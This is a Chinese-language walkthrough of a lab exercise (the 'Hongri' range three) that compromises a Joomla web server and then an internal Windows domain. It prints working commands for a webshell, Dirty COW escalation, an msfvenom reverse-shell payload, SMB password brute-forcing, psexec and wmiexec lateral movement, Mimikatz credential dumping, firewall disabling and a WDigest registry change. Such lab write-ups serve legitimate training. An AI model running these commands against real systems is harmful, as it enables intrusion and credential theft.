内网渗透——红日靶场三
字数 1703 2025-08-29 22:41:39
内网渗透实战教学:红日靶场三渗透测试全流程
一、环境准备与网络拓扑
1. 网络配置
- 外网段:192.168.57.0/24 (NAT模式)
- 内网段:192.168.93.0/24 (仅主机模式)
- VMnet配置:必须为内网段配置VMnet3,否则路由设置会出问题
2. 靶机组成
- 外网机器:Ubuntu (192.168.57.145)
- 内网机器:
- 域控:WIN-8GA56TNV3MV (192.168.93.10)
- WIN2008服务器 (192.168.93.20)
- WIN7主机 (192.168.93.30)
二、外网渗透阶段
1. 信息收集
-
端口扫描:
nmap -sS 192.168.57.145发现开放端口:80(HTTP)、3306(MySQL)等
-
Web应用识别:
- 使用Joomscan识别CMS版本:
joomscan -u http://192.168.57.145 - 确认Joomla版本:3.9.12
- 使用Joomscan识别CMS版本:
-
目录扫描:
- 使用dirmap发现敏感文件:
- /1.php - 包含配置信息
- /configuration.php~ - 包含数据库凭据
- 使用dirmap发现敏感文件:
2. 数据库利用
-
连接MySQL:
- 使用Navicat或命令行连接:
mysql -h 192.168.57.145 -u [username] -p[password]
- 使用Navicat或命令行连接:
-
提取管理员凭据:
- 查询
joomla数据库中的am2zu_users表 - 获取超级用户哈希:
$2y$10$OLQJ/GnhLJR/AqLsSk1hFOyqL8TxGG2r9R3QeRCibGCQGj6ZyJvCe - 使用密码
123456成功登录后台
- 查询
3. 漏洞利用(CVE-2021-23132)
-
漏洞复现步骤:
- 进入Media → Options
- 修改文件路径实现目录遍历
- 在
/templates/beez3/error.php写入一句话木马
-
Webshell连接:
- 使用蚁剑连接:
http://192.168.57.145/templates/beez3/error.php
- 使用蚁剑连接:
4. 绕过disable_functions
- 使用蚁剑插件绕过限制
- 选择适当的绕过模式并执行
5. 内网发现
- 执行
ifconfig发现新网段:192.168.93.120/24 - 确认存在反向代理架构
6. SSH横向移动
-
凭据发现:
- 在
/tmp/mysql/test.txt找到SSH凭据
- 在
-
SSH登录:
ssh [username]@192.168.57.145
7. 权限提升(脏牛漏洞)
- 漏洞利用:
gcc -pthread dirty.c -o dirty -lcrypt ./dirty - 结果:
- 创建新用户
firefart,密码123456 - 获得root权限
- 创建新用户
8. 上线MSF
-
生成payload:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.57.128 LPORT=5555 -f elf -o shell.elf -
监听设置:
use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.57.128 set LPORT 5555 run
三、内网渗透阶段
1. 路由与代理配置
-
添加路由:
route add 192.168.93.0 255.255.255.0 [session_id] -
设置SOCKS代理:
use auxiliary/server/socks_proxy set version 4a set srvport 8989 run
2. 内网信息收集
-
主机发现:
- 使用MSF的
arp_scanner模块扫描192.168.93.0/24网段
- 使用MSF的
-
端口扫描:
use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.93.10 192.168.93.20 192.168.93.30 set PORTS 1-10000 run
3. 横向移动(SMB爆破)
-
爆破WIN2008:
use auxiliary/scanner/smb/smb_login set RHOSTS 192.168.93.20 set SMBUser administrator set pass_file /root/dict/pass.txt run- 获取密码:
123qwe!ASD
- 获取密码:
-
psexec横向:
use exploit/windows/smb/psexec set payload windows/x64/meterpreter/bind_tcp set SMBUser administrator set SMBPass 123qwe!ASD set RHOSTS 192.168.93.20 run
4. 域渗透
-
信息收集:
- 确认域名为:test.org
- 域控IP:192.168.93.10
-
凭据提取:
load kiwi kiwi_cmd privilege::debug kiwi_cmd sekurlsa::logonPasswords- 获取域管密码:
zxcASDqw123!!
- 获取域管密码:
-
域控横向:
- 方法一:WMIexec
proxychains4 python3 wmiexec.py -debug 'administrator:zxcASDqw123!!@192.168.93.10' - 方法二:关闭防火墙后psexec
netsh advfirewall set allprofiles state off
- 方法一:WMIexec
四、关键技术与工具总结
1. 核心技术
- Joomla漏洞利用(CVE-2021-23132)
- Linux提权(脏牛漏洞)
- SMB协议利用(psexec/wmiexec)
- 域环境渗透技巧
2. 主要工具
- 信息收集:nmap、Joomscan、dirmap
- Webshell管理:蚁剑
- 漏洞利用:MSF、自定义exploit
- 横向移动:psexec、wmiexec.py
- 凭据提取:Mimikatz(kiwi)
3. 渗透流程总结
- 外网Web应用渗透
- 获取初始立足点
- 内网探测与横向移动
- 权限提升与持久化
- 域环境渗透与控制
五、常见问题解决
-
反弹shell失败:
- 检查网络架构,确认是否存在反向代理
- 尝试bind shell替代reverse shell
-
Mimikatz抓不到密码:
- 尝试修改注册表后重新登录
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f- 重启或等待用户重新登录
-
psexec横向失败:
- 检查目标防火墙状态
- 尝试替代方法如wmiexec或smbexec
-
代理设置问题:
- 确保/etc/proxychains4.conf配置正确
- 测试代理通道是否畅通